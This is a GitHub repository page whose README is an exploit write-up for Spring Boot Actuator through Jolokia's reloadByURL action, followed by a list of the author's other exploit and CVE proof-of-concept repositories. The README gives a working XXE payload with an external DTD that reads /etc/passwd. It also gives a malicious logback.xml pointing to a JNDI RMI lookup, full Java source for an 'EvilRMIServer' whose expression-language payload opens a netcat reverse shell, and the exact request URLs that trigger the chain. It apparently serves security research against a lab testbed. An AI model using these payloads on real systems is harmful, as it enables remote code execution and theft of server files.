• Stars
    star
    316
  • Rank 129,392 (Top 3 %)
  • Language
    Java
  • Created over 5 years ago
  • Updated about 4 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Spring Boot Actuator (jolokia) XXE/RCE

Spring Boot Actuator (jolokia) XXE/RCE

Information and payload from the following article: https://www.veracode.com/blog/research/exploiting-spring-boot-actuators

Edit 28/02/2020: another article to achieve RCE using H2 Database Remote Code Execution in Three Acts: Chaining Exposed Actuators and H2 Database Aliases in Spring Boot 2

Tested on Spring Boot Actuator < 2.0.0 and Jolokia 1.6.0.

If you have access to the following ressource /actuator/jolokia or /jolokia with Spring Boot Actuator and the following ressource: reloadByURL, this writeup can help you to exploit an XXE and ultimately and RCE.

Setup the environment:

git clone https://github.com/artsploit/actuator-testbed
cd actuator-testbed
mvn install
mvn spring-boot:run

1. The jolokia XXE

If the action reloadByURL exists, the logging configuration can be reload from an external URL: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/127.0.0.1:1337!/logback.xml

The XML parser behind logback is SAXParser. We can exploit this feature to trigger an XXE Out-Of-Band Error based using the following payload:

# file logback.xml from the server 127.0.0.1:1337
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE a [ <!ENTITY % remote SYSTEM "http://127.0.0.1:8080/file.dtd">%remote;%int;]>
<a>&trick;</a>
# file file.dtd from the server 127.0.0.1:8080
<!ENTITY % d SYSTEM "file:///etc/passwd"> 
<!ENTITY % int "<!ENTITY trick SYSTEM ':%d;'>">

The server responds with an error and the content of the file /etc/passwd is directly contained in it:

image

2. Jolokia RCE

Exploiting an XXE is always nice but a RCE is always better. Instead of loading a fake XML we can send a legit XML configuration file to logback and fully exploit the feature.

  1. We ask to jolokia to load the new logging configuration file from an external URL
  2. The logging config contains a link to a malicious RMI server
  3. The malicious RMI server will use a template expression vulnerability to execute code on the remote server

In other words, JNDI is a simple Java API (such as 'InitialContext.lookup(String name)') that takes just one string parameter, and if this parameter comes from an untrusted source, it could lead to remote code execution via remote class loading.

https://www.veracode.com/blog/research/exploiting-jndi-injections-java

Content of the logback.xml file:

<configuration>
  <insertFromJNDI env-entry-name="rmi://127.0.0.1:1097/jndi" as="appName" />
</configuration>

Since my JDK is > 1.8.0_191 it's not possible to directly execute code using the RMI Service, so instead I will use this technique: https://www.veracode.com/blog/research/exploiting-jndi-injections-java

Then the next step is to create a vulnerable RMI service:

import java.rmi.registry.*;
import com.sun.jndi.rmi.registry.*;
import javax.naming.*;
import org.apache.naming.ResourceRef;
 
public class EvilRMIServer {
    public static void main(String[] args) throws Exception {
        System.out.println("Creating evil RMI registry on port 1097");
        Registry registry = LocateRegistry.createRegistry(1097);
 
        //prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory
        ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
        //redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
        ref.add(new StringRefAddr("forceString", "x=eval"));
        //expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows
        ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 1234 >/tmp/f']).start()\")"));
 
        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
        registry.bind("jndi", referenceWrapper);
    }
}

pom.xml to compile this project:

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.springframework</groupId>
    <artifactId>RMIServer</artifactId>
    <version>0.0.1</version>

    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.0.0.RELEASE</version>
    </parent>

    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
    </dependencies>

    <properties>
        <java.version>1.8</java.version>
    </properties>

</project>

Then when the two malicious servers are UP we can call the ressource ReloadByURL:

http://127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/127.0.0.1:1337!/logback.xml

Then the template expression is executed and you get a reverse shell:

rc2

Edit Another writeup to exploit Jolokia https://blog.it-securityguard.com/how-i-made-more-than-30k-with-jolokia-cves/

Ressources:

More Repositories

1

BackupOperatorToDA

From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller
C++
378
star
2

Padding-oracle-attack

πŸ”“ Padding oracle attack against PKCS7 πŸ”“
Python
316
star
3

poodle-PoC

🐩 Poodle (Padding Oracle On Downgraded Legacy Encryption) attack CVE-2014-3566 🐩
Python
243
star
4

CVE-2019-0192

RCE on Apache Solr using deserialization of untrusted data via jmx.serviceUrl
Python
212
star
5

ByP-SOP

πŸ΄β€β˜ οΈ Bypass Same Origin Policy with DNS-rebinding to retrieve local server files πŸ΄β€β˜ οΈ
HTML
194
star
6

CVE-2019-5418

CVE-2019-5418 - File Content Disclosure on Ruby on Rails
192
star
7

CVE-2019-19781

CVE-2019-19781 - Remote Code Execution on Citrix ADC Netscaler exploit
Python
157
star
8

CVE-2019-7238

πŸ±β€πŸ’» Poc of CVE-2019-7238 - Nexus Repository Manager 3 Remote Code Execution πŸ±β€πŸ’»
Python
151
star
9

Rails-doubletap-RCE

RCE on Rails 5.2.2 using a path traversal (CVE-2019-5418) and a deserialization of Ruby objects (CVE-2019-5420)
Ruby
134
star
10

discord-e2e-encryption

πŸ”‘ Tampermonkey script that encrypt and decrypt your messages on Discord πŸ”‘
JavaScript
86
star
11

heartbleed-PoC

πŸ’” Hearbleed exploit to retrieve sensitive information CVE-2014-0160 πŸ’”
Python
77
star
12

BEAST-PoC

πŸ’ͺ Proof Of Concept of the BEAST attack against SSL/TLS CVE-2011-3389 πŸ’ͺ
Python
67
star
13

CVE-2018-17246

CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13
59
star
14

CVE-2019-7609

RCE on Kibana versions before 5.6.15 and 6.6.0 in the Timelion visualizer
51
star
15

CVE-2019-9580

CVE-2019-9580 - StackStorm: exploiting CORS misconfiguration (null origin) to gain RCE
HTML
32
star
16

CVE-2019-3799

CVE-2019-3799 - Spring Cloud Config Server: Directory Traversal < 2.1.2, 2.0.4, 1.4.6
32
star
17

astudiaeth

Master CSI
TeX
28
star
18

CRIME-poc

πŸ”ͺ CRIME attack PoC : a compression oracle attacks CVE-2012-4929 πŸ”ͺ
Python
28
star
19

CVE-2018-16341

CVE-2018-16341 - Nuxeo Remote Code Execution without authentication using Server Side Template Injection
Python
25
star
20

ntlmrelayx-prettyloot

Convert the loot directory of ntlmrelayx into an enum4linux like output
Python
22
star
21

CVE-2018-19276

CVE-2018-19276 - OpenMRS Insecure Object Deserialization RCE
Python
17
star
22

HallOfFame-Root-me.org

πŸ’€ Root-me Hall Of Fame dashboard πŸ’€
Python
15
star
23

DllInjectExec

πŸ’‰ Dll injection for executable file πŸ’‰
C++
14
star
24

Slanger-RCE

RCE in Slanger using deserialization of Ruby objects
Python
12
star
25

CVE-2018-3760

Rails Asset Pipeline Directory Traversal Vulnerability
9
star
26

ropycat

Scripts that allow you to copy/past text into another Windows process to bypass Citrix copy/paste limitation
C#
9
star
27

CVE-2019-9978

CVE-2019-9978 - RCE on a Wordpress plugin: Social Warfare < 3.5.3
9
star
28

discourse-cookie-token-domain

πŸͺ Allow to setup cookie token to authenticate user πŸͺ
Ruby
8
star
29

CVE-2018-11686

CVE-2018-11686 - FlexPaper PHP Publish Service RCE <= 2.3.6
Python
7
star
30

ShareP0wn

ShareP0wn
Python
7
star
31

YTC-ID

πŸ“Œ Get the YouTube channel ID ! πŸ“Œ
HTML
5
star
32

DllInjectService

πŸ’‰ Dll ready to be injected into a service πŸ’‰
C++
5
star
33

copper-jekyll-theme

Copper Jekyll theme - simple and useful
CSS
5
star
34

docker_dashboard

Python
4
star
35

impacket-cme

Python
2
star
36

swindle

Swindle is a project for YouTube Network
PHP
2
star
37

AChat-Reverse-TCP-Exploit

Tested on AChat 0.150 Beta 7 Windows 7/8/10 x86/x64
Python
2
star
38

Ipsum

Small app for YouTube Network. Get a free submit form for YouTube Channel who want join your network. With AngularJS
JavaScript
1
star
39

Pyrox

For Youtube Network with YouTube API V3 Public
PHP
1
star